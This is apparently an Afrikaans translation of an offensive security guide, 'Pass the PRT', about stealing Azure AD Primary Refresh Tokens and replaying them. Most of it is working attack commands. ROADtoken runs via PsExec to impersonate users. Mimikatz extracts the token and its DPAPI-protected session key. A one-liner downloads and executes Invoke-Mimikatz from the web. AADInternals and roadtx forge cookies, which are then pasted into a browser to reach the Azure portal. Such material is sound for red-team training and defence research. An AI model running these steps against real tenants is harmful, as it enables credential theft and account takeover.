Az - Pass the PRT

Wat is 'n PRT

Kontroleer of jy 'n PRT het

Dsregcmd.exe /status

In die SSO-toestand afdeling, moet jy die AzureAdPrt op JA sien.

In dieselfde uitvoer kan jy ook sien of die toestel aan Azure aangesluit is (in die veld AzureAdJoined):

PRT-koekie

Die PRT-koekie word eintlik x-ms-RefreshTokenCredential genoem en dit is 'n JSON Web Token (JWT). 'n JWT bevat 3 dele, die kop, payload en handtekening, geskei deur 'n . en alles is url-veilige base64-gecodeer. 'n Tipiese PRT-koekie bevat die volgende kop en liggaam:

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

Die werklike Primary Refresh Token (PRT) is ingekapsuleer binne die refresh_token, wat geënkripteer is deur 'n sleutel onder die beheer van Azure AD, wat sy inhoud ondoorgrondelik en ondekripteerbaar vir ons maak. Die veld is_primary dui die inkapseling van die primêre verfrissings-token binne hierdie token aan. Om te verseker dat die koekie gebind bly aan die spesifieke aanmeldsessie waarvoor dit bedoel was, word die request_nonce van die logon.microsoftonline.com bladsy oorgedra.

PRT Koekie vloei met behulp van TPM

Die LSASS proses sal die KDF konteks na die TPM stuur, en die TPM sal die sessiesleutel (versamel toe die toestel in AzureAD geregistreer is en in die TPM gestoor is) en die vorige konteks gebruik om 'n sleutel te aflei, en hierdie afgeleide sleutel word gebruik om die PRT koekie (JWT) te onderteken.

Die KDF konteks is 'n nonce van AzureAD en die PRT wat 'n JWT meng met 'n konteks (willekeurige bytes).

Daarom, selfs al kan die PRT nie onttrek word nie omdat dit binne die TPM geleë is, is dit moontlik om LSASS te misbruik om afgeleide sleutels van nuwe kontekste aan te vra en die gegenereerde sleutels te gebruik om Koekies te onderteken.

PRT Misbruik Scenario's

As 'n regte gebruiker is dit moontlik om PRT gebruik aan te vra deur LSASS vir SSO-data te vra. Dit kan gedoen word soos natuurlike toepassings wat tokens van Web Account Manager (token broker) aan vra. WAM stuur die versoek na LSASS, wat tokens vra met 'n ondertekende PRT-assertie. Of dit kan gedoen word met blaaier-gebaseerde (web) vloei waar 'n PRT koekie as kop gebruik word om versoeke na Azure AS aanmeldbladsye te verifieer.

As SISTEEM kan jy die PRT steel as dit nie deur TPM beskerm word nie of interaksie hê met PRT sleutels in LSASS met behulp van crypto APIs.

Pass-the-PRT Aanval Voorbeelde

Aanval - ROADtoken

Vir meer inligting oor hierdie manier kyk hierdie pos. ROADtoken sal BrowserCore.exe van die regte gids uitvoer en dit gebruik om 'n PRT koekie te verkry. Hierdie koekie kan dan met ROADtools gebruik word om te verifieer en 'n volhoubare verfrissings-token te verkry.

Om 'n geldige PRT koekie te genereer, is die eerste ding wat jy nodig het 'n nonce. Jy kan dit kry met:

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Of deur roadrecon te gebruik:

roadrecon auth prt-init

Dan kan jy roadtoken gebruik om 'n nuwe PRT te verkry (voer die hulpmiddel uit vanaf 'n proses van die gebruiker om aan te val):

.\ROADtoken.exe <nonce>

As oneliner:

Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Dan kan jy die gegenereerde koekie gebruik om tokens te genereer om in te log met Azure AD Graph of Microsoft Graph:

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>

Aanval - Gebruik roadrecon

Aanval - Gebruik AADInternals en 'n gelekte PRT

Get-AADIntUserPRTToken kry die gebruiker se PRT-token van die Azure AD-verbonden of Hibrid-verbonden rekenaar. Gebruik BrowserCore.exe om die PRT-token te kry.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Of as jy die waardes van Mimikatz het, kan jy ook AADInternals gebruik om 'n token te genereer:

# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token ac cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

Gaan na https://login.microsoftonline.com, verwyder alle koekies vir login.microsoftonline.com en voer 'n nuwe koekie in.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Then go to https://portal.azure.com

Attack - Mimikatz

Steps

1. Die PRT (Primêre Vernuwings Teken) word uit LSASS (Plaaslike Sekuriteitsowerheid Subsystemdiens) onttrek en gestoor vir latere gebruik.

2. Die Sessie Sleutel word volgende onttrek. Aangesien hierdie sleutel aanvanklik uitgereik word en dan weer deur die plaaslike toestel her-enkripteer word, vereis dit ontsleuteling met 'n DPAPI meester sleutel. Gedetailleerde inligting oor DPAPI (Data Protection API) kan in hierdie bronne gevind word: HackTricks en vir 'n begrip van die toepassing daarvan, verwys na Pass-the-cookie aanval.

3. Na ontsleuteling van die Sessie Sleutel, word die afgeleide sleutel en konteks vir die PRT verkry. Hierdie is noodsaaklik vir die skepping van die PRT koekie. Spesifiek, die afgeleide sleutel word gebruik om die JWT (JSON Web Token) wat die koekie vorm, te teken. 'n Omvattende verduideliking van hierdie proses is deur Dirk-jan verskaf, beskikbaar hier.

You can find an in depth explanation of the performed process to extract these details in here: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

You can use mimikatz to extract the PRT:

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)

Kopieer die deel gemerk Prt en stoor dit. Onttrek ook die sessiesleutel (die KeyValue van die ProofOfPossesionKey veld) wat jy hieronder gemerk kan sien. Dit is versleuteld en ons sal ons DPAPI meester sleutels moet gebruik om dit te ontsleutel.

Om die sessiesleutel te ontsleutel moet jy jou regte verhoog na SISTEEM om onder die rekenaar konteks te werk om die DPAPI meester sleutel te gebruik om dit te ontsleutel. Jy kan die volgende opdragte gebruik om dit te doen:

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Opsie 1 - Volledige Mimikatz

• Nou wil jy beide die Konteks waarde kopieer:

• En die afgeleide sleutel waarde:

• Laastens kan jy al hierdie inligting gebruik om PRT koekies te genereer:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

• Gaan na https://login.microsoftonline.com, verwyder alle koekies vir login.microsoftonline.com en voer 'n nuwe koekie in.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

• Gaan dan na https://portal.azure.com

Opsie 2 - roadrecon met PRT

• Vernuw die PRT eers, wat dit in roadtx.prt sal stoor:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

• Nou kan ons tokens versoek met die interaktiewe blaaiertjie met roadtx browserprtauth. As ons die roadtx describe opdrag gebruik, sien ons die toegangstoken sluit 'n MFA-eis in omdat die PRT wat ek in hierdie geval gebruik het ook 'n MFA-eis gehad het.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Opsie 3 - roadrecon met afgeleide sleutels

Met die konteks en die afgeleide sleutel wat deur mimikatz gedump is, is dit moontlik om roadrecon te gebruik om 'n nuwe geskrewe koekie te genereer met:

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>

Verwysings

• https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

• https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/

• https://www.youtube.com/watch?v=x609c-MUZ_g